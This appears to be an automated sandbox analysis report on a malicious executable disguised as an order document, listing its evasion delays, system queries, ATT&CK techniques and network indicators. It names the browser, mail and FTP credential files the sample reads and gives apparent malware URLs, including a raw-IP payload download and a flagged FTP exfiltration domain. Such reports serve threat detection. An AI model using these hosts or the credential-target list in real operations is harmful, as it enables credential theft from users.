            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeThread delayed: delay time: 597610Jump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeThread delayed: delay time: 597485Jump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeThread delayed: delay time: 597360Jump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeThread delayed: delay time: 597235Jump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeThread delayed: delay time: 597110Jump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeThread delayed: delay time: 596985Jump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeThread delayed: delay time: 596860Jump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeThread delayed: delay time: 596735Jump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeThread delayed: delay time: 596610Jump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeThread delayed: delay time: 596485Jump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeThread delayed: delay time: 596360Jump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeThread delayed: delay time: 596235Jump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeThread delayed: delay time: 596110Jump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeThread delayed: delay time: 595985Jump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeThread delayed: delay time: 595860Jump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeThread delayed: delay time: 595735Jump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeThread delayed: delay time: 595610Jump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeThread delayed: delay time: 595485Jump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeThread delayed: delay time: 595360Jump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeThread delayed: delay time: 595235Jump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeThread delayed: delay time: 595110Jump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeThread delayed: delay time: 594985Jump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeThread delayed: delay time: 594844Jump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeThread delayed: delay time: 594734Jump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeThread delayed: delay time: 594625Jump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeThread delayed: delay time: 594516Jump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeThread delayed: delay time: 594391Jump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeThread delayed: delay time: 594266Jump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeThread delayed: delay time: 594156Jump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeThread delayed: delay time: 594046Jump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeWindow / User API: threadDelayed 1520Jump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeWindow / User API: threadDelayed 8302Jump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nszD14F.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeAPI coverage: 1.5 %
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exe TID: 5104Thread sleep count: 37 > 30Jump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exe TID: 5104Thread sleep time: -34126476536362649s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exe TID: 5104Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exe TID: 1920Thread sleep count: 1520 > 30Jump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exe TID: 5104Thread sleep time: -599875s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exe TID: 1920Thread sleep count: 8302 > 30Jump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exe TID: 5104Thread sleep time: -599765s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exe TID: 5104Thread sleep time: -599656s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exe TID: 5104Thread sleep time: -599519s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exe TID: 5104Thread sleep time: -599391s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exe TID: 5104Thread sleep time: -599281s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exe TID: 5104Thread sleep time: -599172s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exe TID: 5104Thread sleep time: -599063s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exe TID: 5104Thread sleep count: 31 > 30Jump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exe TID: 5104Thread sleep time: -598938s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exe TID: 5104Thread sleep time: -598815s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exe TID: 5104Thread sleep time: -598688s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exe TID: 5104Thread sleep time: -598578s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exe TID: 5104Thread sleep time: -598469s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exe TID: 5104Thread sleep time: -598344s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exe TID: 5104Thread sleep time: -598235s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exe TID: 5104Thread sleep time: -598110s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exe TID: 5104Thread sleep time: -597985s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exe TID: 5104Thread sleep time: -597860s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exe TID: 5104Thread sleep time: -597735s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exe TID: 5104Thread sleep time: -597610s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exe TID: 5104Thread sleep time: -597485s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exe TID: 5104Thread sleep time: -597360s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exe TID: 5104Thread sleep time: -597235s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exe TID: 5104Thread sleep time: -597110s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exe TID: 5104Thread sleep time: -596985s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exe TID: 5104Thread sleep time: -596860s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exe TID: 5104Thread sleep time: -596735s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exe TID: 5104Thread sleep time: -596610s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exe TID: 5104Thread sleep time: -596485s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exe TID: 5104Thread sleep time: -596360s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exe TID: 5104Thread sleep time: -596235s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exe TID: 5104Thread sleep time: -596110s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exe TID: 5104Thread sleep time: -595985s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exe TID: 5104Thread sleep time: -595860s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exe TID: 5104Thread sleep time: -595735s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exe TID: 5104Thread sleep time: -595610s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exe TID: 5104Thread sleep time: -595485s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exe TID: 5104Thread sleep time: -595360s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exe TID: 5104Thread sleep time: -595235s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exe TID: 5104Thread sleep time: -595110s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exe TID: 5104Thread sleep time: -594985s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exe TID: 5104Thread sleep time: -594844s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exe TID: 5104Thread sleep time: -594734s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exe TID: 5104Thread sleep time: -594625s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exe TID: 5104Thread sleep time: -594516s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exe TID: 5104Thread sleep time: -594391s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exe TID: 5104Thread sleep time: -594266s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exe TID: 5104Thread sleep time: -594156s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exe TID: 5104Thread sleep time: -594046s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeCode function: 0_2_004069FF FindFirstFileW,FindClose,0_2_004069FF
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeCode function: 0_2_00405DAE CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405DAE
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeCode function: 0_2_00402930 FindFirstFileW,0_2_00402930
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeCode function: 11_2_00402930 FindFirstFileW,11_2_00402930
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeCode function: 11_2_004069FF FindFirstFileW,FindClose,11_2_004069FF
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeCode function: 11_2_00405DAE CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,11_2_00405DAE
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeThread delayed: delay time: 599875Jump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeThread delayed: delay time: 599765Jump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeThread delayed: delay time: 599656Jump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeThread delayed: delay time: 599519Jump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeThread delayed: delay time: 599391Jump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeThread delayed: delay time: 599281Jump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeThread delayed: delay time: 599172Jump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeThread delayed: delay time: 599063Jump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeThread delayed: delay time: 598938Jump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeThread delayed: delay time: 598815Jump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeThread delayed: delay time: 598688Jump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeThread delayed: delay time: 598578Jump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeThread delayed: delay time: 598469Jump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeThread delayed: delay time: 598344Jump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeThread delayed: delay time: 598235Jump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeThread delayed: delay time: 598110Jump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeThread delayed: delay time: 597985Jump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeThread delayed: delay time: 597860Jump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeThread delayed: delay time: 597735Jump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeThread delayed: delay time: 597610Jump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeThread delayed: delay time: 597485Jump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeThread delayed: delay time: 597360Jump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeThread delayed: delay time: 597235Jump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeThread delayed: delay time: 597110Jump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeThread delayed: delay time: 596985Jump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeThread delayed: delay time: 596860Jump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeThread delayed: delay time: 596735Jump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeThread delayed: delay time: 596610Jump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeThread delayed: delay time: 596485Jump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeThread delayed: delay time: 596360Jump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeThread delayed: delay time: 596235Jump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeThread delayed: delay time: 596110Jump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeThread delayed: delay time: 595985Jump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeThread delayed: delay time: 595860Jump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeThread delayed: delay time: 595735Jump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeThread delayed: delay time: 595610Jump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeThread delayed: delay time: 595485Jump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeThread delayed: delay time: 595360Jump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeThread delayed: delay time: 595235Jump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeThread delayed: delay time: 595110Jump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeThread delayed: delay time: 594985Jump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeThread delayed: delay time: 594844Jump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeThread delayed: delay time: 594734Jump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeThread delayed: delay time: 594625Jump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeThread delayed: delay time: 594516Jump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeThread delayed: delay time: 594391Jump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeThread delayed: delay time: 594266Jump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeThread delayed: delay time: 594156Jump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeThread delayed: delay time: 594046Jump to behavior
            Source: Order NO 000293988494948595850000595995000.exe, 0000000B.00000002.3705946618.0000000004B18000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWPf
            Source: Order NO 000293988494948595850000595995000.exe, 0000000B.00000002.3705946618.0000000004B71000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeAPI call chain: ExitProcess graph end nodegraph_0-4397
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeAPI call chain: ExitProcess graph end nodegraph_0-4400
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeCode function: 0_2_74331BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_74331BFF
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess created: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exe "C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeQueries volume information: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeCode function: 0_2_00403665 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403665
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 0000000B.00000002.3726491154.0000000034FAC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3726491154.0000000034F81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Order NO 000293988494948595850000595995000.exe PID: 7972, type: MEMORYSTR
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeDirectory queried: number of queries: 1001
            Source: Yara matchFile source: 0000000B.00000002.3726491154.0000000034F81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Order NO 000293988494948595850000595995000.exe PID: 7972, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 0000000B.00000002.3726491154.0000000034FAC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3726491154.0000000034F81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Order NO 000293988494948595850000595995000.exe PID: 7972, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
            Windows Management Instrumentation
            1
            DLL Side-Loading
            1
            DLL Side-Loading
            1
            Disable or Modify Tools
            2
            OS Credential Dumping
            13
            File and Directory Discovery
            Remote Services1
            Archive Collected Data
            1
            Ingress Tool Transfer
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault Accounts1
            Native API
            1
            Registry Run Keys / Startup Folder
            1
            Access Token Manipulation
            1
            Deobfuscate/Decode Files or Information
            1
            Credentials in Registry
            226
            System Information Discovery
            Remote Desktop Protocol2
            Data from Local System
            11
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)11
            Process Injection
            2
            Obfuscated Files or Information
            Security Account Manager311
            Security Software Discovery
            SMB/Windows Admin Shares1
            Email Collection
            2
            Non-Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
            Registry Run Keys / Startup Folder
            1
            DLL Side-Loading
            NTDS141
            Virtualization/Sandbox Evasion
            Distributed Component Object Model1
            Clipboard Data
            13
            Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Masquerading
            LSA Secrets1
            Application Window Discovery
            SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts141
            Virtualization/Sandbox Evasion
            Cached Domain Credentials1
            System Network Configuration Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            Access Token Manipulation
            DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
            Process Injection
            Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            Order NO 000293988494948595850000595995000.exe5%ReversingLabs
            Order NO 000293988494948595850000595995000.exe18%VirustotalBrowse
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\nszD14F.tmp\System.dll0%ReversingLabs
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            http://ftp.concaribe.com100%Avira URL Cloudmalware
            http://109.248.150.252/CoefvoxbOhqqwMfAyfMH15.binK0%Avira URL Cloudsafe
            http://109.248.150.252/CoefvoxbOhqqwMfAyfMH15.bin0%Avira URL Cloudsafe
            http://concaribe.com100%Avira URL Cloudmalware
            NameIPActiveMaliciousAntivirus DetectionReputation
            api.ipify.org
            104.26.12.205
            truefalse
              high
              concaribe.com
              192.185.13.234
              truetrue
                unknown
                ftp.concaribe.com
                unknown
                unknowntrue
                  unknown
                  NameMaliciousAntivirus DetectionReputation
                  https://api.ipify.org/false
                    high
                    http://109.248.150.252/CoefvoxbOhqqwMfAyfMH15.binfalse
                    • Avira URL Cloud: safe
                    unknown
                    NameSourceMaliciousAntivirus DetectionReputation
                    https://api.ipify.orgOrder NO 000293988494948595850000595995000.exe, 0000000B.00000002.3726491154.0000000034F31000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      http://ftp.concaribe.comOrder NO 000293988494948595850000595995000.exe, 0000000B.00000002.3726491154.0000000034FAC000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: malware
                      unknown
                      http://nsis.sf.net/NSIS_ErrorErrorOrder NO 000293988494948595850000595995000.exefalse
                        high
                        http://concaribe.comOrder NO 000293988494948595850000595995000.exe, 0000000B.00000002.3726491154.0000000034FAC000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        unknown
